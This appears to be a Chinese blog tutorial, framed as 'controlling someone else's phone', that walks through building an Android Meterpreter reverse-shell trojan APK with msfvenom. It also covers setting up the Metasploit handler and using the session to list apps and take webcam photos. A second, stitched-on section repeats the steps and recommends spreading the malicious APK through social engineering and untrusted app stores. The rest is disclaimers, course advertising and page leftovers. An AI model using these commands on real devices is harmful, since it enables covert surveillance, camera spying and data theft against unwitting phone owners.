如何利用MSF远程渗透操控别人手机?一文详解。

黑客技术之MSF远程渗透操控别人手机

一、前言

MSF,全称为Metasploit Framework,是kali中一款全球知名的开源渗透测试工具。此文章中的方法只能进行内网渗透。由于kali在虚拟机中,其显示的内网IP无法被外网的安卓手机S直接访问,所以不能直接将文章方法应用于外网。该实验为模拟环境,未经授权的渗透都是违法行为,我们都是守法的好公民。而且这种方法只能渗透安卓10以下的系统,入侵渗透更高级的系统需要更加专业的知识,再加上只能进行内网渗透,所以这种方法很难进行违法渗透!

img

二、演示环境

攻击主机:虚拟机 kali IP:192.168.147.129

靶机:联想模拟器 安卓9

三、渗透过程

(一)查询虚拟机中kali的IP

我先在终端中输入ifconfig查询了自己虚拟机中kali的ip地址,如下图,可知ip为192.168.147.129

图片

(二)使用root权限

我先在终端输入su root,输入自己的密码,使用root权限,然后在此权限下进行以下操作。

(三)生成木马

这个木马是放在靶机上的,目的是与攻击主机进行连接,使攻击主机控制靶机,为了隐蔽,我们可以把木马与软件或网站链接捆绑在一起,神不知鬼不觉地使木马在靶机上运行起来,这也就是为什么尽量不要在第三方网站下载破解软件,不要随便点击不明网站的原因。这里我为了追求方便,就直接裸木马

输入msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.147.129 LPORT=6666 R >木马.apk(这里的 LHOST换成自己kali的ip,LPORT换成一个没被占用的端口,后面的木马安装包apk的名称自定义)生成的安装包apk会默认生成在桌面的主文件夹中,并把此木马放在靶机上(在靶机上安装后软件名默认为MainActivity),先不要运行,如下图:

图片

图片

(四)打开MSF

我继续在终端输入msfconsole打开SF`(这里打开之后显示的图案是随机的)

图片

(五)配置攻击载荷

我接着在终端中输入以下命令进行配置(一条一条输入)

use exploit/multi/handler //选择模块

set payload android/meterpreter/reverse_tcp //选择攻击模块

set LHOST 192.168.147.129 //与你自己kali的IP保持一致

set LPORT 6666 //与你之前设置的端口保持一致

(六)运行

配置完之后我输入run运行,然后双击靶机上的木马,使它在靶机上运行,出现类似如下图,则代表渗透成功:

(七)控制靶机的指令

1、查看对方手机系统信息

命令:sysinfo

2、查看对方手机安装哪些app文件

命令:app_list

3、控制摄像头拍摄一张照片

注意:要先给虚拟机摄像头权限,安装上相机,有前置摄像头开关的电脑要打开它

命令:webcam_snap

题外话

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

网络安全学习路线&学习资源

下面给大家分享一份2025最新版的网络安全学习路线资料,帮助新人小白更系统、更快速的学习黑客技术!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

需要高清完整学习路线图,和全套网络安全技术教程的小伙伴!
↓↓↓ 扫描下方图片即可前往获取↓↓↓
在这里插入图片描述

学习资料电子文档

压箱底的好资料,全面地介绍网络安全的基础理论,包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等,将基础理论和主流工具的应用实践紧密结合,有利于读者理解各种主流工具背后的实现机制。

网络安全源码合集+工具包

​​​​​​

视频教程
很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,,每个章节都是当前板块的精华浓缩。(全套教程点击领取哈)

​ 优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

在这里插入图片描述

​​ 因篇幅有限,仅展示部分资料,需要扫描下方图片即可前往获取

在这里插入图片描述

好了就写到这了,大家有任何问题也可以随时私信问我!希望大家不要忘记点赞收藏哦!

特别声明:

此教程为纯技术分享!本文的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本书的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。!!!

本文转自网络,如有侵权请联系删除。

### 使用 Kali Linux 和 Metasploit Framework 对 Android 设备进行渗透测试 #### 准备工作 为了确保环境配置正确,在开始之前需更新和升级 Kali Linux 的包管理器以及安装最新版本的 Metasploit Framework[^1]。 ```bash apt update && apt upgrade -y apt install metasploit-framework -y ``` #### 启动 Metasploit Framework 通过 `msfconsole` 命令可以启动 Metasploit Framework 并进入其交互式命令行界面。这一步骤对于后续操作至关重要,因为所有的渗透测试活动都将在此环境中执行[^2]。 ```bash msfconsole ``` #### 配置监听模块 针对 Android 设备的渗透测试通常涉及使用特定的有效载荷(payload)。下面是一个常见的有效载荷设置过程: - **选择多平台反向 TCP Shell** ```ruby use exploit/multi/handler set payload android/meterpreter/reverse_tcp ``` - **设定 LHOST 参数** 这里需要指定本地 IP 地址作为回调地址,即攻击者机器上的 IP 地址。 ```ruby set LHOST <Your_Kali_IP_Address> ``` - **设定 LPORT 参数** 设置用于接收连接请求的端口号,默认情况下可以选择 4444 或其他未被占用的端口。 ```ruby set LPORT 4444 ``` - **开启监听** 执行此指令后,Metasploit 将等待来自目标设备的连接尝试。 ```ruby exploit -j -z ``` #### 创建恶意 APK 文件 为了让 Android 用户下载并运行含有恶意代码的应用程序,可利用 msfvenom 工具生成带有自定义图标和名称的 APK 文件。 ```bash msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your_Kali_IP_Address> LPORT=4444 R > malicious.apk ``` #### 社会工程学手段传播恶意应用 将生成好的 APK 发送给潜在受害者或者上传到不受信任的应用商店让对方自行下载安装。请注意这种行为仅限于合法授权范围内的安全评估活动中。 #### 获取 Meterpreter Session 一旦受害者的手机成功安装并打开了该应用程序,则会在 Metasploit 控制台中看到一个新的 session 被创建出来。此时便可以获得对受感染系统的完全控制权限。 ```ruby sessions -i <Session_ID> ``` #### 实施进一步行动 有了 meterpreter shell 访问权之后就可以开展更多深入调查动作比如提取敏感数据、提权等高级技巧。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值